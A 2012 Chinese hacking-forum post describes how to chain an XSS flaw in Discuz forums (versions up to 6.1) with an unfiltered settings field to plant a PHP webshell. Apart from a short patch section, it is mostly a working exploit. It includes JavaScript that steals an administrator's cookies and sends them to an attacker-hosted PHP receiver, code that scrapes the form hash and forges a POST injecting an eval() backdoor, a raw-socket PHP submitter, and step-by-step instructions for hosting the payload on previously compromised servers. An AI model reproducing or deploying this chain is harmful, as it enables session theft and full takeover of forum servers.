中国网络渗透测试联盟

标题: Discuz XSS得webshell [打印本页]

作者: admin    时间: 2012-9-13 17:11
标题: Discuz XSS得webshell
Discuz XSS得webshell
( P7 P0 L" P0 r  i7 J8 z, w% HBy racle @tian6.com
+ c1 \2 c. a5 C/ b2 E欢迎转帖.但请保留版权信息.
3 s. \! ~0 {- [1 A0 K+ u受影响版本iscuz<=6.1.0,gbk+utf+big59 N$ l& m7 E' z* i/ W( s
3 ]/ J; w4 J7 V2 B
新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.6 P$ j* I8 j3 R( K

% |9 L) |2 z! q/ a! I0 @& |% p: \* h8 t' g* N1 P  Z0 E
3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706
" {4 q0 F; V* |/ f) n& o当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.; x6 K4 O$ t" {

4 W3 v7 q' ]5 W! G) D) ~分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..& `8 F( b2 S8 H+ |2 J% w, O
本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS7 i  V6 n9 |- }- E2 D
- f0 Z5 o+ |' }3 u& e9 t

8 S  A+ i4 h% c----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------
' n4 Y3 b* U- C* U. u* G& r4 @

' B8 u5 t  C8 Z# I4 |1 j/ ?  lproblem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.
8 a0 K, K6 N2 C+ Y4 S) `( i( K
, A7 B, d0 c  g' x! E; o8 x- sproblem2ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.) Z# ]7 h# Q. `/ p% I3 I: `  L

2 p6 _2 d& j6 `8 n3 `4 T3 D2 wproblem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.
( h- |8 ?2 d8 J
+ Y5 x3 E! U) g* ^8 r7 W9 B, p$ m$ @! k2 z( k  P
下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {; v  k' U+ c+ Z( y4 X
# ?% ?0 T4 ~/ P8 t
        global $runwizardfile, $runwizardhistory;& @# }6 o. Q8 t3 N- z5 J
- ]. x- {0 ~1 ?
        $fp = fopen($runwizardfile, 'w');  S$ Z9 V- s* [  J! d: [3 L

9 t$ g& E% m2 [- G. E, Y        fwrite($fp, serialize($runwizardhistory));
9 D. Z: z* e3 |9 R+ \0 w/ f) g4 \' l/ T
        fclose($fp);3 {$ w3 Z2 F& a0 @
/ J/ `) x7 S* o7 v1 r! X
}
2 k7 |! r& q9 `1 e" J. X8 l复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.4 U- T* a- ~9 f+ |" \
以下是修补的办法:function saverunwizardhistory() {" a& s8 b3 t3 s3 c2 ?
6 M: [3 W: D+ M' O' h, S2 a
        global $runwizardfile, $runwizardhistory;* s- A& u$ q' v% M, F
3 }/ X9 \) Z7 L; a: b+ L
        $fp = fopen($runwizardfile, 'w');7 ~6 v* c7 h2 E7 }# z! J8 K' c& b

+ v: H& p% l" L2 X# T3 p        $s = '<?php exit;?>';
7 s' \) O  j! s0 C/ |! O# O& p5 d, x" k4 i+ J6 k% Q+ R  i2 {
        $s .= serialize($runwizardhistory);
& q# ^5 {# r2 N2 x' u! z( |1 s$ [) U% T- P' z8 |0 b! l
        fwrite($fp, $s);
( T& ^) x% w5 `6 M
* {# ~6 m: }3 ?1 y4 N9 [        fclose($fp);5 O+ M- I/ Q5 X
/ w) ]% L$ ]; F! N
}
  c5 x+ B9 [) Y2 S+ M3 Z/ P" v复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.
; {/ `  p' ]+ u' _' z  ?* i, I  v5 x9 t- Y

) t2 d/ x6 ]% H$ U2 Y
: h' A3 I! a/ I' X4 O2 X9 F9 K----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------4 _8 ?# D' v* W! s
% }2 Z6 T8 {3 Y" M. D8 ^4 s

- u: }3 t/ {/ G; A, i8 C. ]  以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.1 T$ X5 s3 I0 L

9 N" ~; V! _2 ~4 r我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.
& O( x) o. R% V4 v
! w  Z" S9 U, E: p# x这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.
0 b! `* Y# P+ y# G/ }3 n1 f/ R) w1 t% N' v/ e. d
首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:+ Y- ]3 Q. e+ @
' G; U6 q# {" A
var url="http://目标网站/admincp.php";      : M" ?+ O* ^; ^2 S1 C2 ?' b1 Q

# K+ Y/ O. N8 z# ~/ P& A+ p/*获得cookies*/: O. d& e6 e6 ]: r) A$ z
' s! s4 k* m' J) g! O
function getURL(s) {
$ s. ~* }# V2 T: |5 q6 w# {& J: B$ }5 B5 z5 f1 A
var image = new Image();
8 @) l, Z* G) J
/ `& T9 |. @! k  dimage.style.width = 0;& ?$ T: C* P  {. X
% f6 b* ?, C! w  H) H
image.style.height = 0;
* `4 C* U% {; S' r! \- |' @9 E- t/ ?: f- W- |& X
image.src = s;
" f8 Q$ R. j3 F+ P2 e5 G
6 h. c% d4 M  V5 g* x5 _}5 z. u, e' W+ Z% T3 s) o

" l4 E7 e2 ?! C8 J8 m& y2 qgetURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie));  //这里就通过image变量传给了php
+ r3 M& z2 u9 T. |复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];3 Y, P9 _7 Y# ~0 k) _$ ~5 ]
复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵)
, B. N, A1 Q! \' B6 G+ E  x. ^
3 G. }, v, }- e, a, H8 P4 E5 x; P1 F1 H. j; Z5 {: i! \
获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";
$ {3 D  t  d0 h6 \& ~; L$ H5 m# M: v& ^: U  A/ W; O8 _: u

; Z( ]4 o2 Y/ k4 x& |8 K% s7 E5 v! H+ ~3 M& R6 V( G! o
/*hash*/' L: b4 T. d2 _2 u9 Z- {
* c1 `* F) h9 X: p, J% n+ G( j3 g; Y
var xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");9 E2 \- j- `% [8 e9 Y. o6 K
; n* h1 X6 e1 a! C% Q# E* G
xmlHttpReq.open("GET", url+"admincp.php?action=home", false);
/ Z4 E! F# ~, f7 L- K' Z0 m$ m8 {- s- ~, u
xmlHttpReq.send();
: a- j% q& Z- _5 n( _, w: Y! W
" H' t; K! m' j/ ?. s# ^var resource = xmlHttpReq.responseText;
9 M" G2 p7 E% |/ l' A( W1 `; l+ m& R1 J7 x* t" X
var numero = resource.search(/formhash/);
0 m: G- q& C' o5 M' j+ q( q8 T0 v+ _% b- z8 |
var formhash=encodeURIComponent(resource.substr(numero+17,8));
- k" X  P9 _3 y$ @3 C$ C% O% v& e; J. V% }( j8 j
: v  o, n  Z9 D2 t% @, A8 T+ K, H

" q3 p. }& T' t( y! D% i* `2 evar post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据 0 u7 V' G& g7 x' u; E* V! c

; D2 \8 J% N; C7 p( r: BxmlHttpReq.open("OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信
% {4 y, i5 V) T2 Q
! `# C0 k8 m' G% C- PxmlHttpReq.setRequestHeader("Referer", url);: y4 Q2 x# |7 m) O
3 f! \- g, j) t& v( d" ^7 g
xmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");# Y- q/ z, _. h$ W! Y

3 U' r, D+ Z, C+ X( Y. t0 YxmlHttpReq.setrequestheader("content-length",post.length); 7 ~$ v# \3 ]: W- v# K4 r

: t% [/ G9 p9 RxmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded");
3 v4 o9 L, J3 Q: D# j+ ?: y/ w, m* i
8 o3 ~1 j+ _# c5 c' p4 K! i/ B6 TxmlHttpReq.send(post);//发送数据8 b/ c% R6 d1 U2 d
复制代码这里HASH我假设正确,这样提交,也无须cookies
# U) ]; }9 C& ?" |  V+ i( G: c, U6 Z" W, l
再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);
' r5 u- Z8 ]" J) ^8 L! b- X# d6 s
( `* A/ d$ `% k( Z8 lif (!$sock) die("$errstr ($errno)\n");
9 H' u1 v6 i1 u0 n  M
) l$ ?8 ?4 w0 r( N. G$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';4 q. E5 W( s" s. ]6 c1 ^0 i: \
5 `/ ]. s! H; @
, y" X' ~& z& C" c  Y; X9 c
1 a  F$ _  G  w2 m- M8 y7 k+ W: n) p
fwrite($sock, "OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");" E6 i( U. w' w1 g5 Q

  v8 T3 ~# A- {3 T2 ?) H2 o+ I% Efwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");% a' }" J) }( ?9 r& u$ K

) z  G7 \$ X% |) l& E/ o" gfwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");
" m1 \2 W- `$ a5 m4 Y' r7 p3 `, v$ T/ B0 _/ i
fwrite($sock, "Accept-Language: zh-cn\r\n");) m  B7 c' J: ?$ o5 g; t8 C" L
" `6 N6 }% q# d) S# }
fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
! r) I2 P. B) t- n% {( X0 [$ g( B8 M
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");4 y: g- A% t+ v% I& c7 \* n

" ?1 _7 u. v( x* b/ Q, D; @1 @6 yfwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");" Q, C! k1 f- t2 R$ l" g

1 y; W# y1 m) A! T) dfwrite($sock, "Host: $url\r\n");4 h( E" D2 }4 y4 x# w" U
% n/ U7 p; A1 {9 H: {9 n
fwrite($sock, "Content-Length: ".strlen($data)."\r\n");; r6 Q9 d" T; R! t. U6 k5 C& F) Q3 ]' F

, C' M) T! N6 ^6 W( g. F" s* Afwrite($sock, "Connection: Keep-Alive\r\n");5 a* Q1 Z' ^& F0 ~

! h6 @" B, Y  P1 T$ Sfwrite($sock, "Cache-Control: no-cache\r\n");2 B6 R: A5 b, U1 E& x8 s
$ B, X; y7 E0 ^) k/ i3 k
fwrite($sock, "Cookie:".$cookies."\r\n\r\n");
( D$ n, P+ _  O  m" w' k% U' d7 R. A1 C3 L7 e3 P
fwrite($sock, $data);
. @3 ?- Y, M  d4 V$ E+ n/ J0 Y* J- J2 z" N' K' I: y) Q

! n# F  I( J/ _1 j9 t: q
& `# g; {8 y2 y! m/ H$headers = "";+ F7 z: D2 d7 ~
' ]* {4 p. y3 a0 l4 W# _/ a1 i! U
while ($str = trim(fgets($sock, 4096)))) F8 `3 W) B; Z6 X, C) `5 B
' A/ Z5 W4 D+ c
     $headers .= "$str\n";# F" }3 a3 c* S1 U8 o' \5 r) v& j
% Q# U0 e  m3 V
echo "\n";& m+ c/ \$ M' m$ l2 \. c
/ ]2 b6 r/ A+ @9 ^! q  w
$body = "";
; p# P7 }# j. S
/ `# A- V8 i7 h7 ~: Mwhile (!feof($sock)), T& U$ o& }! r# {; l: S
. k* L) J0 {: j/ ]8 ]+ D& z
     $body .= fgets($sock, 4096);
  k4 |$ x1 t% ]3 G. g
& i  R' N- z( C% {- w8 O6 [% sfclose($sock);& O% a% @1 l7 ^; E% A
3 L! O7 ]  X' A; ^
echo $body;! s* @# \2 K( d( ?6 W! ]1 J. p3 L
复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^6 ]9 Y, l7 n8 h5 }: C) W

1 n$ {2 Q' t$ h& j
/ m) C& A3 J& L-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------
5 V* s. R  d- C3 _' D, Q8 O0 n" E; R" S8 Z( I6 }3 p
' k3 H' X  }) w, |9 k% U
1HP SOCKET利用方法首先打开racle.js- ?6 \0 F0 o0 u5 D, G- g

' {# L# ~4 q, n- Y' uvar url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home( E4 G0 Y4 {4 ?0 s6 C

1 F% o: e% c$ e/ }% a) \
: z' F6 R1 ^4 p& F3 e: N. N
, u) c- F: I$ y- K0 p然后打开racle@tian6.php
$ i7 t3 J* m+ [) r; n
/ X6 C+ _4 l5 m$url="racle@tian6.com";   //改成你要XSS攻击的目标,譬如www.discuz.com
! y& b5 L9 [' x5 h9 P- [% O" f, L+ A/ k2 k& W, \# v. {
+ y; u! V  t6 V7 {3 {4 }) y# v* l2 |
# e- e8 U: h0 F3 f0 }; u- P- N
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
6 }" h, y6 W& P
$ V6 j5 h2 }7 v) G5 ggetURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));2 Y, O$ `3 n0 I$ i5 H; a+ }& s: u

# h8 P/ `- w9 h. {3 W; h; V. `" b+ |) b: i. Q) Z+ f' n' |
3 Q5 E; g( D# ?+ e# f; v; r" T
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));# }% \* ]. [' o6 f
复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址.
4 {- Z: S; H% @8 ^" Z. p
( U4 U) X, r" Q  P
5 b, I2 N- a9 j, R
9 k) y/ N2 i9 q% l1 T如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:3 F7 t7 \: Y5 {$ T# m, D

* M2 i$ q; b0 q% S5 V( dvar formhash=encodeURIComponent(resource.substr(numero+17,8));# f& \. x! n" U" j+ w7 {
. [1 f4 k/ k* M& O! ^# x; ?9 g3 ~
* {+ r# I/ d, U! a# o
' ^; H( ~) {% h6 u! u' N
var formhash=encodeURIComponent(resource.substr(numero+9,8));" k$ Y6 ~; N7 ]% C% R, q& @
复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.$ y2 d& f  _1 G$ {3 b' y

) M% G8 \8 N- d. W! L% J如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.3 I* d6 o3 s$ L$ V
: \' N; ?* z8 r$ w  t3 a% U
如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点.
& f7 ?  @8 b+ I( G5 {0 U2 S: j$ k" m) @% c7 z' }: c
不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.( i& a8 L* G) ^1 [1 `/ A4 T
7 s' }7 Q3 l: a. C$ |





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2